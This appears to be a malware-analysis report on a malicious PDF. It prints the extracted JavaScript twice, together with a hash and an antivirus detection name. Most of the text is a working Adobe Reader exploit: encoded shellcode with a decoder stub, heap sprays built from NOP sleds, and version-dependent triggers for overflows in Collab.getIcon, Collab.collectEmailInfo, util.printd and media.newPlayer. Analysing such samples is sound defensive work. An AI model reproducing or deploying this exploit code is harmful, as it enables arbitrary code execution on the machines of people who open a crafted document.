%u6b52%u7754%u7451%u7358%u784e%u7850%u6b58%u6f55%u7451%u7053%u7350%u7354%u7854%u7358%u784f%u7050%u7557%u774f%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6b58%u6f55%u7851%u6b52%u6f55%u7451%u7358%u6b4e%u7850%u7355%u6f4f%u7757%u7451%u6f4f%u7757%u7456%u6f4f%u7755%u7053%u6f4f%u7757%u7456%u6f4f%u7755%u7852%u6b58%u7754%u7457%u6b52%u7754%u7851%u6b58%u6f55%u7851%u7053%u7350%u7354%u7854%u7358%u784f%u7050%u7557%u774f%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6b58%u6f55%u7457%u6b52%u6f55%u7851%u7355%u6f4f%u7757%u7851%u6f4f%u7757%u7857%u6f4f%u7755%u7053%u6f4f%u7757%u7857%u6f4f%u7755%u7852%u7a56%u7050%u6f4f%u7757%u7051%u6f4f%u7755%u6c53%u7a56%u7050%u6b58%u6f55%u7051%u7358%u734c%u7950%u7355%u6f4f%u7755%u6c53%u7a56%u7050%u6f4f%u7755%u7454%u7555%u6b58%u6c4e%u7755%u6b58%u6d57%u7850%u6b58%u6d55%u6c50%u7655%u6b58%u7357%u6c53%u6b58%u7457%u7353%u7857%u7350%u734f%u7655%u6b58%u7657%u7052%u7350%u734f%u7353%u794c%u7954%u7154%u6d5a%u7350%u734c%u7655%u7353%u764f%u6f50%u6e4b%u7051%u7a53%u724f%u7457%u7850%u714c%u6e4c%u6d50%u7350%u724f%u7054%u6b4e%u714f%u6b53%u6e4f%u6e55%u7557%u754e%u7a55%u6b58%u6b4e%u6b58%u7a55%u7452%u7350%u6d4d%u7656%u6b58%u6c50%u6b54%u6b58%u7a55%u6c51%u7350%u6d4d%u6b58%u7450%u6b58%u7350%u754c%u6e55%u6f55%u6d55%u724c%u7850%u7050%u784e%u7057%u6d4f%u6f4f%u6f4f%u7356%u7a53%u6c55%u7156%u4e72%u4576%u5877%u5576%u7070%u7356%u4d56%u7456%u4e72%u4576%u5877%u5576%u7052%u4f72%u5376%u5052%u7356%u7a53%u6c55%u7156%u4e72%u5067%u5476%u5676%u5050" +
"%u3030");

function do1()
{
garbage = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090") + shellcode;
nopblock = unescape("%u9090%u9090"); 

var strtmp = "headersize = 10;acl = headersize+garbage.length;while (nopblock.length<acl) nopblock+=nopblock;fillblock = nopblock.substring(0, acl);";
eval(strtmp);
var strtmp1 = "block = nopblock.substring(0, nopblock.length-acl);";
eval(strtmp1);
while(block.length+acl<0x40000) block = block+block+fillblock;
memory = new Array();
var strtmp4 = "for (i=0;i<180;i++) memory[i] = block + garbage;var buffersize = 4012;var buffer = Array(buffersize);";
eval(strtmp4);
for (i=0; i<buffersize; i++)
{
buffer[i] = unescape("%0a%0a%0a%0a");
}

var strtmp3 = "Collab.get"+"Icon(buffer+'_N.bundle');";
eval(strtmp3);
}


function do2()
{
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<=0x40000) block = block+block+fillblock;
memory = new Array(); for (i=0;i<200;i++) memory[i] = block + shellcode;
try {this.media.newPlayer(null);} catch(e) {}
util.printd(String.fromCharCode(2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570), new Date());
}

if (app.viewerVersion > 9.0)
{
	do2();
}


function re(count,what) 
{
var v = "";
while (--count >= 0) 
v += what;
return v;
} 
function start() 
{
if (app.viewerVersion >= 7.0)
{
plin = re(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u9090%u9090") + re(40,unescape("%u0b0b%u0028%u06eb%u06eb")) + shellcode + re(1256,unescape("%u4141%u4141"));
} 
else 
{
ef6 =  unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = re(80,unescape("%u9090%u9090")) + shellcode + re(80,unescape("%u9090%u9090"))+ unescape("%ue7e9%ufff9")+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0) 
plin = unescape("%u4141") + plin;

plin += re(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
this.collabStore = Collab.collectEmailInfo({subj: "",msg: plin});
}
}

if (app.viewerVersion >= 8.0)
{
	do1();
}
else
{
	var strtmp2 = "var shaft = app.setTimeOut("start()",1200);";
        eval(strtmp2);
}
generic_stage_recovery_003.js deobfuscated-js generic stage recovery percent-decode -> split-literal-normalize from decompressed stream at 0x1164 at offset 0x1164 7367 bytes
SHA-256: fd498efa8e139a9da978baa89dfc6c5cea5ce9104400161ffe511310db7136e7
Detection
ClamAV: Pdf.Exploit.Agent-35646
Obfuscation or payload: likely
Carved artifact contains 26 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var shellcode = unescape("%u9090%u9090%u9090%u9090%uEB90%u5E1a%u5B56%u068a%u303c%u1674%uE0c0%u4604%u268a%uE480%u020f%u88c4%u4303%uEB46%uE8e9%uFFe1%uFFff"+
"%u7456%u715a%u7053%u7050%u7050%u7050%u7059%u6b58%u7054%u6c50%u7059%u6b58%u7057%u6c51%u6d5a%u6b58%u7057%u7850%u7059%u794e%u6b58%u7250%u7050%u7050%u7855%u7059%u7158%u6c4e%u7050%u7250%u7050%u7050%u6b58%u6c4f%u7958%u7757%u7850%u7958%u7754%u7051%u6f4f%u7757%u7850%u7856%u6c4e%u7759%u7350%u6c50%u784e%u7a51%u7250%u7050%u7050%u7958%u7754%u6c51%u6f4f%u7757%u7850%u7856%u764f%u7252%u794b%u6c57%u784e%u7a50%u7250%u7050%u7050%u7059%u7958%u7754%u7052%u6f4f%u7757%u7850%u7856%u755a%u7751%u7050%u6c57%u784e%u794f%u7150%u7050%u7050%u7958%u7754%u7452%u6f4f%u7757%u7850%u7856%u6b4f%u7759%u6d4f%u6f50%u784e%u794e%u7150%u7050%u7050%u7059%u7958%u7754%u7852%u6f4f%u7757%u7850%u7856%u7651%u7556%u7a4f%u7051%u784e%u784d%u7150%u7050%u7050%u7958%u7754%u6c52%u6f4f%u7757%u7850%u7856%u6f51%u7957%u7a50%u784e%u784e%u784c%u7150%u7050%u7050%u7958%u7754%u7053%u7059%u7059%u7059%u7059%u7059%u7059%u6f4f%u7757%u7850%u7856%u6c5a%u7850%u7a4d%u7657%u784e%u724b%u7150%u7050%u7050%u7958%u7754%u7853%u6f4f%u7757%u7850%u7856%u7859%u6e4f%u7a58%u6e50%u784e%u725a%u7150%u7050%u7050%u7958%u7754%u6c53%u6f4f%u7757%u7850%u7856%u7457%u7958%u6c4e%u7959%u784e%u7259%u7150%u7050%u7050%u7958%u7754%u7054%u6f4f%u7757%u7850%u7856%u6e57%u784d%u724e%u7357%u784e%u7258%u7150%u7050%u7050%u7958%u7754%u7454%u6f4f%u7757%u7850%u7856%u6d5a%u6b59%u6d57%u6f4d%u784e%u7257%u7150%u7050%u7050%u7958%u7754%u7854%u7059%u7059%u7059%u7059%u7059%u7059%u7353%u764f%u7654%u6d58%u7754%u7056%u7055%u7655%u6f4f%u7755%u7854%u7358%u784f%u6f4f%u7457%u724f%u6d53%u7050%u7051%u7050%u7050%u7657%u6b4e%u7958%u7754%u7450%u7958%u7757%u7056%u6f4f%u7757%u7450%u7a56%u7054%u6f4f%u7755%u6c51%u7958%u7754%u6c55%u7a56%u7050%u7a56%u7050%u7a56%u7050%u6f4f%u7757%u7056%u6f4f%u7755%u7853%u7358%u784f%u6f4f%u7457%u7756%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6f4f%u7757%u7450%u6f4f%u7757%u6c55%u6f4f%u7757%u7056%u6f4f%u7755%u6c52%u6b58%u6f54%u7057%u7358%u794e%u7051%u6b58%u7754%u6c55%u7054%u7158%u7853%u7654%u6e52%u7a55%u7856%u7557%u7950%u7158%u7857%u7450%u7352%u7650%u7158%u7951%u7457%u7450%u724e%u6c4e%u6b4e%u7653%u7358%u704c%u7850%u7958%u7754%u7451%u7054%u7158%u7853%u7a54%u7557%u7356%u6b54%u7557%u7950%u7158%u7857%u7450%u7251%u7150%u7358%u7951%u7457%u7450%u724e%u6c4e%u6b4e%u7a51%u7358%u704c%u7850%u7958%u7754%u7851%u7054%u7158%u7853%u7654%u7954%u7654%u7154%u7557%u7950%u7158%u7857%u7450%u7350%u7750%u7358%u7951%u7457%u7251%u724e%u6c4e%u6f4f%u7757%u6c55%u6f4f%u7755%u7052%u6f50%u7558%u7655%u6f4f%u6f4f%u6f4f%u7059%u7059%u7059%u7059%u7958%u7754%u7457%u7a56%u7050%u7a56%u7250%u7a56%u7250%u7a56%u7050%u7a56%u7350%u7856%u7050%u7050%u7050%u7054%u6b58%u6f55%u7051%u7358%u734c%u7451%u7355%u6f4f%u7755%u7452%u7958%u7754%u7857%u7a56%u7050%u7a56%u7250%u7a56%u7250%u7a56%u7050%u7a56%u7350%u7856%u7050%u7050%u7050%u7054%u6f4f%u7757%u7051%u6f4f%u7755%u7452%u7958%u7754%u7456%u7059%u7059%u7059%u7059%u7059%u7059%u7059%u6b58%u7754%u7851%u6b52%u7754%u7451%u7358%u784e%u7850%u6b58%u6f55%u7451%u7053%u7350%u7354%u7854%u7358%u784f%u7050%u7557%u774f%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6b58%u6f55%u7851%u6b52%u6f55%u7451%u7358%u6b4e%u7850%u7355%u6f4f%u7757%u7451%u6f4f%u7757%u7456%u6f4f%u7755%u7053%u6f4f%u7757%u7456%u6f4f%u7755%u7852%u6b58%u7754%u7457%u6b52%u7754%u7851%u6b58%u6f55%u7851%u7053%u7350%u7354%u7854%u7358%u784f%u7050%u7557%u774f%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6b58%u6f55%u7457%u6b52%u6f55%u7851%u7355%u6f4f%u7757%u7851%u6f4f%u7757%u7857%u6f4f%u7755%u7053%u6f4f%u7757%u7857%u6f4f%u7755%u7852%u7a56%u7050%u6f4f%u7757%u7051%u6f4f%u7755%u6c53%u7a56%u7050%u6b58%u6f55%u7051%u7358%u734c%u7950%u7355%u6f4f%u7755%u6c53%u7a56%u7050%u6f4f%u7755%u7454%u7555%u6b58%u6c4e%u7755%u6b58%u6d57%u7850%u6b58%u6d55%u6c50%u7655%u6b58%u7357%u6c53%u6b58%u7457%u7353%u7857%u7350%u734f%u7655%u6b58%u7657%u7052%u7350%u734f%u7353%u794c%u7954%u7154%u6d5a%u7350%u734c%u7655%u7353%u764f%u6f50%u6e4b%u7051%u7a53%u724f%u7457%u7850%u714c%u6e4c%u6d50%u7350%u724f%u7054%u6b4e%u714f%u6b53%u6e4f%u6e55%u7557%u754e%u7a55%u6b58%u6b4e%u6b58%u7a55%u7452%u7350%u6d4d%u7656%u6b58%u6c50%u6b54%u6b58%u7a55%u6c51%u7350%u6d4d%u6b58%u7450%u6b58%u7350%u754c%u6e55%u6f55%u6d55%u724c%u7850%u7050%u784e%u7057%u6d4f%u6f4f%u6f4f%u7356%u7a53%u6c55%u7156%u4e72%u4576%u5877%u5576%u7070%u7356%u4d56%u7456%u4e72%u4576%u5877%u5576%u7052%u4f72%u5376%u5052%u7356%u7a53%u6c55%u7156%u4e72%u5067%u5476%u5676%u5050" +
"%u3030");

function do1()
{
garbage = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090") + shellcode;
nopblock = unescape("%u9090%u9090"); 

var strtmp = "headersize = 10;acl = headersize+garbage.length;while (nopblock.length<acl) nopblock+=nopblock;fillblock = nopblock.substring(0, acl);";
eval(strtmp);
var strtmp1 = "block = nopblock.substring(0, nopblock.length-acl);";
eval(strtmp1);
while(block.length+acl<0x40000) block = block+block+fillblock;
memory = new Array();
var strtmp4 = "for (i=0;i<180;i++) memory[i] = block + garbage;var buffersize = 4012;var buffer = Array(buffersize);";
eval(strtmp4);
for (i=0; i<buffersize; i++)
{
buffer[i] = unescape("



");
}

var strtmp3 = "Collab.get"+"Icon(buffer+'_N.bundle');";
eval(strtmp3);
}


function do2()
{
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<=0x40000) block = block+block+fillblock;
memory = new Array(); for (i=0;i<200;i++) memory[i] = block + shellcode;
try {this.media.newPlayer(null);} catch(e) {}
util.printd(String.fromCharCode(2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570), new Date());
}

if (app.viewerVersion > 9.0)
{
	do2();
}


function re(count,what) 
{
var v = "";
while (--count >= 0) 
v += what;
return v;
} 
function start() 
{
if (app.viewerVersion >= 7.0)
{
plin = re(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u9090%u9090") + re(40,unescape("%u0b0b%u0028%u06eb%u06eb")) + shellcode + re(1256,unescape("%u4141%u4141"));
} 
else 
{
ef6 =  unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = re(80,unescape("%u9090%u9090")) + shellcode + re(80,unescape("%u9090%u9090"))+ unescape("%ue7e9%ufff9")+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0) 
plin = unescape("%u4141") + plin;

plin += re(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
this.collabStore = Collab.collectEmailInfo({subj: "",msg: plin});
}
}

if (app.viewerVersion >= 8.0)
{
	do1();
}
else
{
	var strtmp2 = "var shaft = app.setTimeOut("start()",1200);";
        eval(strtmp2);
}

Open this report in the interactive analyzer, or submit your own file for analysis.